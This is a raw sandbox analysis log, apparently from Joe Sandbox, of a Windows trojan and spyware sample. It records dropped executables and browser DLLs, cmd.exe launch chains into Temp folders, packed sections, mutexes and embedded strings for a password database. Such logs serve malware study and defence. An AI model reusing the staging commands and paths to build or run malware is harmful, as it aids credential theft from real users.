Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C35D320 0_2_6C35D320
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C32C370 0_2_6C32C370
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C315340 0_2_6C315340
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C31F380 0_2_6C31F380
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C3853C8 0_2_6C3853C8
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Code function: 9_2_00362818 9_2_00362818
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Code function: 9_2_00324CD0 9_2_00324CD0
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Code function: 9_2_00357533 9_2_00357533
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Code function: 9_2_00366E0B 9_2_00366E0B
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Code function: 9_2_003666B9 9_2_003666B9
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Code function: 9_2_00324AD0 9_2_00324AD0
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Code function: 9_2_00367ED0 9_2_00367ED0
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Code function: 9_2_00366F2B 9_2_00366F2B
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Code function: 9_2_00362380 9_2_00362380
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: String function: 6C34CBE8 appears 134 times
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: String function: 6C3594D0 appears 90 times
Sample file is different than original file name gathered from version info
Source: tAa6xNsucX.exe, 00000000.00000002.2341418867.000000006C595000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs tAa6xNsucX.exe
Source: tAa6xNsucX.exe, 00000000.00000002.2341002828.000000006C3A2000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs tAa6xNsucX.exe
Uses 32bit PE files
Source: tAa6xNsucX.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tAa6xNsucX.exe Static PE information: Section: ZLIB complexity 0.9995712652439024
Source: tAa6xNsucX.exe Static PE information: Section: ZLIB complexity 0.99383544921875
Source: tAa6xNsucX.exe Static PE information: Section: ZLIB complexity 0.989990234375
Source: HIIEBAFCBK.exe.0.dr Static PE information: Section: ZLIB complexity 0.9981756524725275
Source: HIIEBAFCBK.exe.0.dr Static PE information: Section: loawlfyy ZLIB complexity 0.9944898592715232
Source: amadka[1].exe.0.dr Static PE information: Section: ZLIB complexity 0.9981756524725275
Source: amadka[1].exe.0.dr Static PE information: Section: loawlfyy ZLIB complexity 0.9944898592715232
Source: explortu.exe.7.dr Static PE information: Section: ZLIB complexity 0.9981756524725275
Source: explortu.exe.7.dr Static PE information: Section: loawlfyy ZLIB complexity 0.9944898592715232
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@18/28@0/3
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C377030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6C377030
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5692:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5844:120:WilError_03
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File created: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: tAa6xNsucX.exe, 00000000.00000002.2340623071.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, tAa6xNsucX.exe, 00000000.00000002.2327877769.000000001CCFB000.00000004.00000020.00020000.00000000.sdmp, tAa6xNsucX.exe, 00000000.00000002.2341269322.000000006C54F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: tAa6xNsucX.exe, 00000000.00000002.2340623071.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, tAa6xNsucX.exe, 00000000.00000002.2327877769.000000001CCFB000.00000004.00000020.00020000.00000000.sdmp, tAa6xNsucX.exe, 00000000.00000002.2341269322.000000006C54F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: tAa6xNsucX.exe, 00000000.00000002.2340623071.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, tAa6xNsucX.exe, 00000000.00000002.2327877769.000000001CCFB000.00000004.00000020.00020000.00000000.sdmp, tAa6xNsucX.exe, 00000000.00000002.2341269322.000000006C54F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: tAa6xNsucX.exe, 00000000.00000002.2340623071.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, tAa6xNsucX.exe, 00000000.00000002.2327877769.000000001CCFB000.00000004.00000020.00020000.00000000.sdmp, tAa6xNsucX.exe, 00000000.00000002.2341269322.000000006C54F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: tAa6xNsucX.exe, 00000000.00000002.2340623071.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, tAa6xNsucX.exe, 00000000.00000002.2327877769.000000001CCFB000.00000004.00000020.00020000.00000000.sdmp, tAa6xNsucX.exe, 00000000.00000002.2341269322.000000006C54F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: tAa6xNsucX.exe, 00000000.00000002.2340623071.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, tAa6xNsucX.exe, 00000000.00000002.2327877769.000000001CCFB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: tAa6xNsucX.exe, 00000000.00000002.2340623071.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, tAa6xNsucX.exe, 00000000.00000002.2327877769.000000001CCFB000.00000004.00000020.00020000.00000000.sdmp, tAa6xNsucX.exe, 00000000.00000002.2341269322.000000006C54F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: tAa6xNsucX.exe, 00000000.00000003.2176181618.0000000000841000.00000004.00000020.00020000.00000000.sdmp, tAa6xNsucX.exe, 00000000.00000003.2197743227.0000000022DD1000.00000004.00000020.00020000.00000000.sdmp, FBGHCGCAEBFIJKFIDBGH.0.dr, FHDAEHDAKECGCAKFCFIJ.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: tAa6xNsucX.exe, 00000000.00000002.2340623071.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, tAa6xNsucX.exe, 00000000.00000002.2327877769.000000001CCFB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: tAa6xNsucX.exe, 00000000.00000002.2340623071.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, tAa6xNsucX.exe, 00000000.00000002.2327877769.000000001CCFB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: tAa6xNsucX.exe Virustotal: Detection: 43%
Source: tAa6xNsucX.exe ReversingLabs: Detection: 42%
Source: HIIEBAFCBK.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explortu.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explortu.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explortu.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File read: C:\Users\user\Desktop\tAa6xNsucX.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\tAa6xNsucX.exe "C:\Users\user\Desktop\tAa6xNsucX.exe"
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\HCAAEGIJKE.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe "C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe"
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Process created: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe "C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe" Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\HCAAEGIJKE.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe "C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Process created: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe "C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe" Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: duser.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.ui.immersive.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bcp47mrm.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uianimation.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: d3d10warp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dxcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dcomp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: wininet.dll Jump to behavior
